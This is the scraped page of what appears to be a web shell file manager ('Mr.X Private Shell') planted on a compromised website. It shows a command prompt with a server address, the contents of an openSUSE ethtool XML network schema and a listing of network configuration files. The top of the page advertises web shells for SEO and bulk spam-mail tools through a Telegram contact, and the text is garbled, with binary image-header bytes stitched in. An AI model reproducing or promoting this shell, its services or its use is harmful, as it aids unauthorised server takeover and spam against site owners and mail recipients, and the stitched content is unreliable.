xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<!--
  Ethtool service definition
  -->
<service name="ethtool" interface="org.opensuse.Network.Ethtool" object-class="netif">

  <define name="priv-flag"      class="dict">
    <name                       type="string"/>
    <enabled                    type="boolean"/>
  </define>

  <define name="advertising-type"    class="dict">
    <autoneg                    type="boolean"/>
    <port-types                 class="array" element-type="string" element-name="type"/>
    <speed-modes                class="array" element-type="string" element-name="mode"/>
    <pause-frames               class="array" element-type="string" element-name="type"/>
    <fec-modes                  class="array" element-type="string" element-name="mode"/>
    <unknown                    type="string"/>
  </define>

  <define name="feature-type"   class="dict">
    <name                       type="string"/>
    <enabled                    type="boolean"/>
    <fixed                      type="boolean"/>
    <requested                  type="boolean"/>
  </define>

  <define name="link-settings-conf"  class="dict">
    <autoneg                    type="tristate"/>
    <speed                      type="uint32"/>
    <duplex                     type="builtin-ethtool-link-duplex-type"/>
    <port                       type="builtin-ethtool-link-port-type"/>
    <mdix                       type="builtin-ethtool-link-mdix-type"/>
    <phy-address                type="uint32"/>
    <transceiver                type="builtin-ethtool-link-xcvr-type"/>
    <advertise                  class="array" element-type="string" element-name="mode"/>
  </define>
  <define name="link-settings-info"  class="dict" extends="ethtool:link-settings-conf">
    <mdio                       type="builtin-ethtool-link-mdio-type"/>
    <supported                  type="ethtool:advertising-type"/>
    <advertising                type="ethtool:advertising-type"/>
    <lp-advertising             type="ethtool:advertising-type"/>
  </define>

  <define name="ring-type"      class="dict">
    <tx                         type="uint32"/>
    <rx                         type="uint32"/>
    <rx-mini                    type="uint32"/>
    <rx-jumbo                   type="uint32"/>
  </define>

  <define name="channels-type"  class="dict">
    <tx                         type="uint32"/>
    <rx                         type="uint32"/>
    <other                      type="uint32"/>
    <combined                   type="uint32"/>
  </define>

  <define name="coalesce-type"  class="dict">
    <adaptive-tx                type="tristate"/>
    <adaptive-rx                type="tristate"/>

    <pkt-rate-low               type="uint32"/>
    <pkt-rate-high              type="uint32"/>

    <sample-interval            type="uint32"/>
    <stats-block-usecs          type="uint32"/>

    <tx-usecs                   type="uint32"/>
    <tx-usecs-irq               type="uint32"/>
    <tx-usecs-low               type="uint32"/>
    <tx-usecs-high              type="uint32"/>

    <tx-frames                  type="uint32"/>
    <tx-frames-irq              type="uint32"/>
    <tx-frames-low              type="uint32"/>
    <tx-frames-high             type="uint32"/>

    <rx-usecs                   type="uint32"/>
    <rx-usecs-irq               type="uint32"/>
    <rx-usecs-low               type="uint32"/>
    <rx-usecs-high              type="uint32"/>

    <rx-frames                  type="uint32"/>
    <rx-frames-irq              type="uint32"/>
    <rx-frames-low              type="uint32"/>
    <rx-frames-high             type="uint32"/>
  </define>

  <define name="pause-type"     class="dict">
    <tx                         type="tristate"/>
    <rx                         type="tristate"/>
    <autoneg                    type="tristate"/>
  </define>


  <define name="configuration"  class="dict">
    <private-flags              class="array" element-type="ethtool:priv-flag" element-name="flag"/>
    <link-settings              type="link-settings-conf"/>
    <wake-on-lan class="dict">
      <options                  type="builtin-ethtool-wol-flag-mask"/>
      <sopass                   type="ethernet-address"/>
    </wake-on-lan>
    <features                   class="array" element-type="ethtool:feature-type" element-name="feature"/>
    <eee                        class="dict">
      <enabled                  type="tristate"/>
      <tx-lpi                   type="tristate"/>
      <tx-timer                 type="uint32"/>
      <advertise                class="array" element-type="string" element-name="mode"/>
    </eee>
    <ring                       type="ring-type"/>
    <channels                   type="channels-type"/>
    <coalesce                   type="coalesce-type"/>
    <pause                      type="pause-type"/>
  </define>

  <define name="properties"     class="dict">
    <driver-info                class="dict">
      <driver                     type="string"/>
      <version                    type="string"/>
      <bus-info                   type="string"/>
      <firmware-version           type="string"/>
      <expansion-rom-version      type="string"/>
      <supports                   type="builtin-ethtool-driver-supports-mask"/>
    </driver-info>
    <link-detected              type="tristate"/>
    <link-settings              type="ethtool:link-settings-info"/>
    <private-flags              class="array" element-type="ethtool:priv-flag" element-name="flag"/>
    <wake-on-lan class="dict">
      <support                  type="builtin-ethtool-wol-flag-mask"/>
      <options                  type="builtin-ethtool-wol-flag-mask"/>
    </wake-on-lan>
    <features                   class="array" element-type="ethtool:feature-type" element-name="feature"/>
    <eee                        class="dict">
      <enabled                  type="tristate"/>
      <active                   type="tristate"/>
      <tx-lpi                   type="tristate"/>
      <tx-timer                 type="uint32"/>
      <supported                class="array" element-type="string" element-name="mode"/>
      <advertising              class="array" element-type="string" element-name="mode"/>
      <lp-advertising           class="array" element-type="string" element-name="mode"/>
    </eee>
    <ring                       type="ring-type"/>
    <channels                   type="channels-type"/>
    <coalesce                   type="coalesce-type"/>
    <pause                      type="pause-type"/>
  </define>

  <method name="changeDevice">
    <arguments>
      <config type="ethtool:configuration">
        <meta:mapping document-node="/ethtool" skip-unless-present="true" />
      </config>
    </arguments>
  </method>

</service>


Filemanager

Name Type Size Permission Actions
addrconf.xml File 10.82 KB 0644
bonding.xml File 5.64 KB 0644
bridge.xml File 5.05 KB 0644
constants.xml File 16.29 KB 0644
dummy.xml File 1.69 KB 0644
ethernet.xml File 885 B 0644
ethtool.xml File 6.65 KB 0644
firewall.xml File 609 B 0644
gre.xml File 2.05 KB 0644
infiniband.xml File 2.33 KB 0644
interface.xml File 17.52 KB 0644
ipip.xml File 1.71 KB 0644
lldp.xml File 1.75 KB 0644
macvlan.xml File 3.11 KB 0644
ovs-bridge.xml File 1.91 KB 0644
ppp.xml File 2.68 KB 0644
protocol.xml File 2.44 KB 0644
scripts.xml File 2.13 KB 0644
sit.xml File 2.1 KB 0644
team.xml File 4.02 KB 0644
tuntap.xml File 2.37 KB 0644
types.xml File 2.51 KB 0644
vlan.xml File 1.57 KB 0644
vxlan.xml File 2.6 KB 0644
wicked.xml File 853 B 0644
wireless.xml File 4.25 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
admin f – Seiko Business Matching